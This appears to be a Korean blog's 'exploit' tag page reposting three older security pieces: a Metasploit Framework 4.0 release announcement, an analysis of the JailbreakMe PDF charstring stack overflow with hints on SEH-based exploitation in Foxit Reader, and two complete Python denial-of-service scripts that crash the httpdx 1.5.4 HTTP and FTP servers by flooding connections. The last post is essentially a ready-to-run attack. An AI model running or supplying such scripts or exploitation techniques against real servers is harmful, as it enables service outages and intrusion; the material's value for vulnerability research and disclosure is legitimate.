'익스플로잇'에 해당되는 글 5건

  1. 2011.08.02 Metasploit Framework 4.0 Released!
  2. 2011.02.21 More about the JailbreakMe PDF exploit
  3. 2010.08.19 Multiple Denial of Service Vulnerabilities
2011. 8. 2. 18:42

Metasploit Framework 4.0 Released!

It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's fexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions.

 

Five years ago, every exploitation tool out there was focused on running an exploit and getting a shell (usually a crappy cmd.exe shell, at that). Today, Metasploit encompasses every aspect of a penetration test. Dozens of auxiliary modules assist with reconnaisance, more than two hundred others help with information gathering and discovery; hundreds of exploits get you a toe-hold on the network; and the newest addition to the module family, post modules, help simplify and automate increasing your access. All of the data you gather can be stored in a database. For high-quality reporting and even greater automation, Metasploit Pro rounds out an engagement. Five years ago, Metasploit had already come a long way in making exploit development easier but the widespread adoption of DEP and ASLR has pushed the project even further toward accelerating what has now become a much more difficult process.

 

All of that leads us to the Metasploit Framework version 4.0, released today.

 

To make the awesomeness of 4.0 stand out visually from its predecessors, we've built an array of stunning new ASCII art banners. My favorite, of course, is this one:

 

 

In addition to the visual differences, Metasploit Framework 4.0 comes with an abundance of new features and bug fixes. Contributor TheLightCosine continues with his onslaught of password-stealing post modules and another contributor, Silent Dream, has begun helping out in that arena as well. Other post modules have seen considerable improvement and expansion thanks to Carlos Perez. The recent Exploit Bounty netted a total of six new exploit modules, and other development added another 14 since the last release.

 

Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over http and Windows can use https. In a similar vein, POSIX Meterpreter is seeing some new development again. The last developer left it with little documentation on how to build it, so getting it to compile was a hurdle that we put off for too long. Now that it compiles, you can expect a more flexible payload for Linux. It still isn't perfect nor is it nearly as complete as the windows version, but many features already work.

 

Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets. As always, you can get the latest version from http://www.metasploit.com/download/ and full details of this release can be found in the Release Notes.

 

Everyone on the Metasploit team is proud of the first major version bump in half a decade. May it bring you many shells.



출처 : Metasloit Blogs

Trackback 0 Comment 0
2011. 2. 21. 19:40

More about the JailbreakMe PDF exploit

Today has been released the source code of the Jailbreakme exploit, so maybe this explanation comes a bit late. In the update of the previous post about this subject I knew that I was right about the overflow in the arguments stack when parsing the charstrings in the Type 2 format, so here is a little more info.

After decoding the stream of the object 13 we can see the following bytes (talking about this file):

The selected bytes are the important ones for this exploit because the overflow occurs when parsing them. Like I mentioned, the Type 2 format is composed of operands, operators and numbers, and use the stack to push and pop values. This stack has a maximum size of 48 elements. We can understand better the meaning of these bytes with this tips:

 

  • The 0xFF byte means that the next 4 bytes are interpreted as a 32-bit two’s-complement number that will be pushed into the stack.
  • 0x0C17 is the random operator that returns a pseudo random number greater than zero and less than or equal to one. This operator doesn't take any argument from the stack.
  • The operator 0x0C04 is an or that takes two arguments from the stack and puts a 0 is both arguments are zero and a 1 otherwise.
  • 0x0C0D is the index operator, which takes an argument num from the stack and puts the argument in the position num of the stack on the top of it.
  • The drop operator is composed by the bytes 0x0C12 and removes the stack top element.

 

Then, from the stack modification perspective we can separate the bytes in 4 "instructions" set:

 

  • 0xFFXXXXXXXX (45*5 bytes): we put XXXXXXXX into the stack. There is a limit here in the amount of this type of "instruction" because of the stack arguments size, that is checked in this case. So the maximum number that we can push is 45.
  • 0x0C170C170C040C1D (20*8 bytes): it pushes the stack element in position 1 (one position after the top element) into the stack. The position is always 1 because the random elements pushed are always non-zero. So in this case will be 0x00C00000.
  • 0x0C170C1D (170*4 bytes): we push the element in the position specified by the random number into the stack. The random number always has 16 bits and after a 16-bits movement to the right it becomes 0, so the pushed value will be always the top of the stack, 0x00C00000.
  • 0x0C1D0C12 (42*4 bytes): it pushes the stack element in the position C0 into the stack and removes it. The first "instruction" of this type will push F00DF00D (the 4th last number pushed with FF), and the next "instructions" will write into the stack the 41 previous numbers.

 

These "instructions", except the FF one, don't check if the stack is full before pushing values, so after parsing and executing them the stack state will be similar to this image, being 48*4 the maximum size for the stack:

After the last 0x0C12 an FF "instruction" is executed, checking the stack size and returning from the function with an error code. The successful exploitation will depend on the program and the architecture where the PDF file is parsed. As you know, this affects to Apple products (now patched) and to the Foxit Reader. In the case of the latter we can exploit it easily through a SEH overflow, putting the shellcode into the bytes pushed by the FF "instructions". Here we'll have more than 100 bytes for it, depending on the SEH position. Anyway we can jump from here to the rest of the decoded stream and really do what we want.

출처 : http://eternal-todo.com

Trackback 0 Comment 0
2010. 8. 19. 10:53

Multiple Denial of Service Vulnerabilities

#!/usr/bin/env python
  
###########################################################################
#
# Title:    httpdx v1.5.4 Remote HTTP Server DoS (0day)
# By:       Dr_IDE
# Tested:   XPSP3
# Download: http://httpdx.sourceforge.net
# Note:     Server will totally crash if only running the EXE
# Note:     Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may not be exploitable as it dumps on a read operation. 
# Upon crash throws: Access violation when reading [00001238]
#
############################################################################
  
import socket, sys
  
payload = ("GET / HTTP/1.1\r\n\r\n");
x=1;
  
try:
    while (x < 2048):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print ("[*] Connecting to httpdx server.");
        s.connect((sys.argv[1], 80));
        print ("\n[*] Sending command.\n");
        s.send(payload);
        s.close();
        x = x+1;
  
except:
    print ("[*] Success! We crashed the server in %d attempts." % x);
    print ("[i] [pocoftheday.blogspot.com]");
  
  
=====================================================================================
  
#!/usr/bin/env python
  
###########################################################################
#
# Title:    httpdx v1.5.4 Remote FTP Server DoS (0day)
# By:       Dr_IDE
# Tested:   XPSP3
# Download: http://httpdx.sourceforge.net
# Note:     Server will totally crash if only running the EXE
# Note:     Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may be exploitable as it dumps on a write operation. 
# Upon crash throws: Access violation when writing to [00230000]
#
############################################################################
  
import socket, sys
  
payload = ("USER anonymous\r\n\r\n");
x=1;
  
try:
    while (x < 2048):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print ("[*] Connecting to httpdx server.");
        s.connect((sys.argv[1], 21));
        print ("\n[*] Sending command.\n");
        s.send(payload);
        s.close();
        x = x+1;
  
except:
    print ("[*] Success! We crashed the server in %d attempts." % x);
    print ("[i] [pocoftheday.blogspot.com]"); 


출처 : exploit-db.com

Trackback 0 Comment 0